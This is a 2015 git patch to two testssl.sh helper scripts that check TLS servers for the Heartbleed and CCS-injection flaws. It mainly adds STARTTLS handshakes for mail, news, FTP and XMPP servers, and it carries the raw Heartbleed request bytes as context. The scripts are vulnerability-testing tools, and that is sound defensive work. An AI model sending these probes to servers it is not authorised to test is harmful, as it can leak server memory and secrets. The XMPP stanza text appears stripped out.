From fef9afe2885f4d6db3a27421018a691fa455514b Mon Sep 17 00:00:00 2001 From: Dirk Wetter Date: Mon, 6 Jul 2015 22:04:07 +0200 Subject: [PATCH] * protocol checks work now! * generic jabber support now! * jabber domain support --- utils/ccs-injection.bash | 110 ++++++++++++++++++++++++++++++++------- utils/heartbleed.bash | 93 +++++++++++++++++++++++---------- 2 files changed, 156 insertions(+), 47 deletions(-) diff --git a/utils/ccs-injection.bash b/utils/ccs-injection.bash index adefa63..7687d93 100755 --- a/utils/ccs-injection.bash +++ b/utils/ccs-injection.bash @@ -8,6 +8,8 @@ # mainly adapted from the C code from https://gist.github.com/rcvalle/71f4b027d61a78c42607 # thx Ramon de C Valle # +# handshakes from RFCs. Good source too: https://github.com/ioerror/sslscan/blob/master/sslscan.c +# ###### DON'T DO EVIL! USAGE AT YOUR OWN RISK. DON'T VIOLATE LAWS! ####### readonly PS4='${LINENO}: ${FUNCNAME[0]:+${FUNCNAME[0]}(): }' @@ -17,6 +19,7 @@ trap "cleanup" QUIT EXIT NODE="$1" PORT="443" +JABBERNODE=${JABBERNODE} SLEEP=2 MAXSLEEP=10 OCKREPLY="" @@ -115,6 +118,11 @@ parse_hn_port() { echo -e "\n===> connecting to $NODE:$PORT\n" } +debugme() { + [[ $DEBUG -ge 2 ]] && "$@" +} + + wait_kill(){ pid=$1 maxsleep=$2 @@ -132,6 +140,13 @@ wait_kill(){ } +starttls_just_read(){ + echo "=== just read banner ===" + cat <&5 & + wait_kill $! $SLEEP +} + + socksend() { data=`echo $1` echo "\"$data\"" @@ -154,12 +169,41 @@ sockread() { } # arg1: string to send -# arg2: success string, yet to be parsed +# arg2: possible success strings a egrep pattern, needed! starttls_line0() { - echo "$1" >&5 - cat <&5 & + reply=$(mktemp /tmp/reply.XXXXXX) || return 7 + + debugme echo -e "\n=== sending \"$1\" ..." + echo -e "$1" >&5 + dd bs=1024 of=$reply count=32 <&5 2>/dev/null & wait_kill $! $SLEEP - #[ $? -eq 3 ] && fixme "STARTTLS timed out" && exit 1 + debugme echo "... received result: " + cat $reply + if [ -n "$2" ]; then + if egrep -q "$2" $reply; then + debugme echo "---> reply matched \"$2\"" + [ $DEBUG -eq 0 ] && rm $reply + return 0 + else + debugme echo "---> reply didn't match \"$2\", see $reply" + fixme "STARTTLS handshake problem" + exit 1 + fi + fi +} + + +starttls_line1() { + echo "$1" >&5 + while true; do + read line <&5 + echo $line + break + done +} + +fixme(){ + tput bold; tput setaf 5; echo -e "\n$1\n"; tput sgr0 } @@ -171,6 +215,8 @@ ok_ids() { } fd_socket(){ + local jabber="" + if ! exec 5<> /dev/tcp/$NODE/$PORT; then echo "`basename $0`: unable to connect to $NODE:$PORT" exit 2 @@ -178,41 +224,65 @@ fd_socket(){ case "$1" in # port 21) # https://tools.ietf.org/html/rfc4217 - starttls_line0 "FEAT" - starttls_line0 "AUTH TLS" + starttls_just_read + starttls_line0 "FEAT" "211" + #starttls_line0 HELP "214" + starttls_line0 "AUTH TLS" "successful|234" ;; - 25) #https://tools.ietf.org/html/rfc4217 - starttls_line0 "EHLO testssl.sh" "250" + 25) # SMTP, see https://tools.ietf.org/html/rfc4217 + starttls_just_read + starttls_line0 "EHLO testssl.sh" "220|250" starttls_line0 "STARTTLS" "220" ;; - 110) # https://tools.ietf.org/html/rfc2595 + 110) # POP, see https://tools.ietf.org/html/rfc2595 + starttls_just_read starttls_line0 "STLS" "OK" ;; - 119|433) # https://tools.ietf.org/html/rfc4642 - starttls_line0 "CAPABILITIES" "101" + 119|433) # NNTP, see https://tools.ietf.org/html/rfc4642 + starttls_just_read + starttls_line0 "CAPABILITIES" "101|200" starttls_line0 "STARTTLS" "382" ;; - 143) # https://tools.ietf.org/html/rfc2595 + 143) # IMAP, https://tools.ietf.org/html/rfc2595 + starttls_just_read starttls_line0 "a001 CAPABILITY" "OK" starttls_line0 "a002 STARTTLS" "OK" ;; - 389) # https://tools.ietf.org/html/rfc2830, https://tools.ietf.org/html/rfc4511 + 389) # LDAP, https://tools.ietf.org/html/rfc2830, https://tools.ietf.org/html/rfc4511 fixme "LDAP: FIXME not yet implemented" exit 1 ;; - 674) # https://tools.ietf.org/html/rfc2595 + 674) # ACAP = Application Configuration Access Protocol, see https://tools.ietf.org/html/rfc2595 fixme "ACAP: FIXME not yet implemented" exit 1 ;; - 5222) + 5222) # XMPP, see https://tools.ietf.org/html/rfc6120 + starttls_just_read + # following would be without hostname, jabber.org doesn't need it, others do! + #starttls_line0 "\r\n" + [ -z $JABBERNODE ] && JABBERNODE="$NODE" + # as ioerror says: $NODE is not always the correct one, some jabber implementations need a special hostname! + # supply $JABBERNODE in ENV and you're set, like: DEBUG=2 JABBERNODE=google.com ./heartbleed.bash talk.google.com:5222 + jabber=$(cat < + +EOF +) + starttls_line0 "$jabber" starttls_line0 "" "proceed" - fixme "XMPP: FIXME not yet implemented" + # BTW: https://xmpp.net ! ;; - 443|995|993|465|*) # we don't need a special command here + 443|995|993|465|*) # we don't need a special pre-command here ;; - esac + esac echo -} +} + close_socket(){ exec 5<&- @@ -282,4 +352,4 @@ echo exit $ret # vim:tw=100:ts=5:sw=5:expandtab -# $Id: ccs-injection.bash,v 1.7 2015/07/01 17:48:00 dirkw Exp $ +# $Id: ccs-injection.bash,v 1.9 2015/07/06 20:01:49 dirkw Exp $ diff --git a/utils/heartbleed.bash b/utils/heartbleed.bash index 6a151fd..cebf85f 100755 --- a/utils/heartbleed.bash +++ b/utils/heartbleed.bash @@ -6,6 +6,8 @@ # sockets inspired by http://blog.chris007.de/?p=238 # heartbleed mainly adapted from https://gist.github.com/takeshixx/10107280 # +# handshakes from RFCs. Good source too: https://github.com/ioerror/sslscan/blob/master/sslscan.c +# ###### DON'T DO EVIL! USAGE AT YOUR OWN RISK. DON'T VIOLATE LAWS! ####### readonly PS4='${LINENO}: ${FUNCNAME[0]:+${FUNCNAME[0]}(): }' @@ -15,14 +17,17 @@ trap "cleanup" QUIT EXIT NODE="$1" PORT="443" +JABBERNODE=${JABBERNODE} SLEEP=2 MAXSLEEP=10 SOCKREPLY="" COL_WIDTH=32 +DEBUG=${DEBUG:-0} # TLS 1.0=x01 1.1=0x02, 1.2=0x3 TLSV=${2:-01} + heartbleed_payload="\x18\x03\x$TLSV\x00\x03\x01\x40\x00" ## ^^^^^^^ this is the whole thing! @@ -90,6 +95,11 @@ parse_hn_port() { echo -e "\n===> connecting to $NODE:$PORT\n" } +debugme() { + [[ $DEBUG -ge 2 ]] && "$@" +} + + wait_kill(){ pid=$1 maxsleep=$2 @@ -124,33 +134,37 @@ sockread() { wait_kill $! $maxsleep ret=$? SOCKREPLY=$(cat $ddreply) - rm $ddreply + [ $DEBUG -eq 0 ] && rm $ddreply return $ret } -# arg1: string to send -# arg2: success string, yet to be parsed -starttls_line0() { - echo "$1" >&5 + +starttls_just_read(){ + echo "=== just read banner ===" cat <&5 & wait_kill $! $SLEEP - #[ $? -eq 3 ] && fixme "STARTTLS timed out" && exit 1 } -starttls_line2() { +# arg1: string to send +# arg2: possible success strings a egrep pattern, needed! +starttls_line0() { reply=$(mktemp /tmp/reply.XXXXXX) || return 7 - echo "$1" >&5 - dd bs=1024 of=$reply count=1 <&5 2>/dev/null & + + debugme echo -e "\n=== sending \"$1\" ..." + echo -e "$1" >&5 + dd bs=1024 of=$reply count=32 <&5 2>/dev/null & wait_kill $! $SLEEP + debugme echo "... received result: " cat $reply - return 0 if [ -n "$2" ]; then - if grep -q "$2" $reply; then + if egrep -q "$2" $reply; then + debugme echo "---> reply matched \"$2\"" + [ $DEBUG -eq 0 ] && rm $reply return 0 else + debugme echo "---> reply didn't match \"$2\", see $reply" fixme "STARTTLS handshake problem" - #FIXME: handshake antworten kommen irgendwie 1x verzeogert exit 1 fi fi @@ -171,6 +185,8 @@ fixme(){ fd_socket(){ + local jabber="" + if ! exec 5<> /dev/tcp/$NODE/$PORT; then echo "`basename $0`: unable to connect to $NODE:$PORT" exit 2 @@ -178,37 +194,60 @@ fd_socket(){ case "$1" in # port 21) # https://tools.ietf.org/html/rfc4217 - starttls_line0 "FEAT" - starttls_line0 "AUTH TLS" "successful" + starttls_just_read + starttls_line0 "FEAT" "211" + #starttls_line0 HELP "214" + starttls_line0 "AUTH TLS" "successful|234" ;; - 25) #https://tools.ietf.org/html/rfc4217 - starttls_line0 "EHLO testssl.sh" "250" + 25) # SMTP, see https://tools.ietf.org/html/rfc4217 + starttls_just_read + starttls_line0 "EHLO testssl.sh" "220|250" starttls_line0 "STARTTLS" "220" ;; - 110) # https://tools.ietf.org/html/rfc2595 + 110) # POP, see https://tools.ietf.org/html/rfc2595 + starttls_just_read starttls_line0 "STLS" "OK" ;; - 119|433) # https://tools.ietf.org/html/rfc4642 - starttls_line0 "CAPABILITIES" "101" + 119|433) # NNTP, see https://tools.ietf.org/html/rfc4642 + starttls_just_read + starttls_line0 "CAPABILITIES" "101|200" starttls_line0 "STARTTLS" "382" ;; - 143) # https://tools.ietf.org/html/rfc2595 + 143) # IMAP, https://tools.ietf.org/html/rfc2595 + starttls_just_read starttls_line0 "a001 CAPABILITY" "OK" starttls_line0 "a002 STARTTLS" "OK" ;; - 389) # https://tools.ietf.org/html/rfc2830, https://tools.ietf.org/html/rfc4511 + 389) # LDAP, https://tools.ietf.org/html/rfc2830, https://tools.ietf.org/html/rfc4511 fixme "LDAP: FIXME not yet implemented" exit 1 ;; - 674) # https://tools.ietf.org/html/rfc2595 + 674) # ACAP = Application Configuration Access Protocol, see https://tools.ietf.org/html/rfc2595 fixme "ACAP: FIXME not yet implemented" exit 1 ;; - 5222) + 5222) # XMPP, see https://tools.ietf.org/html/rfc6120 + starttls_just_read + # following would be without hostname, jabber.org doesn't need it, others do! + #starttls_line0 "\r\n" + [ -z $JABBERNODE ] && JABBERNODE="$NODE" + # as ioerror says: $NODE is not always the correct one, some jabber implementations need a special hostname! + # supply $JABBERNODE in ENV and you're set, like: DEBUG=2 JABBERNODE=google.com ./heartbleed.bash talk.google.com:5222 + jabber=$(cat < + +EOF +) + starttls_line0 "$jabber" starttls_line0 "" "proceed" - fixme "XMPP: FIXME not yet implemented" + # BTW: https://xmpp.net ! ;; - 443|995|993|465|*) # we don't need a special command here + 443|995|993|465|*) # we don't need a special pre-command here ;; esac echo @@ -263,5 +302,5 @@ echo exit $ret -# vim:tw=100:ts=5:sw=5:expandtab -# $Id: heartbleed.bash,v 1.12 2015/07/01 11:26:10 dirkw Exp $ +# vim:tw=200:ts=5:sw=5:expandtab +# $Id: heartbleed.bash,v 1.14 2015/07/06 19:26:38 dirkw Exp $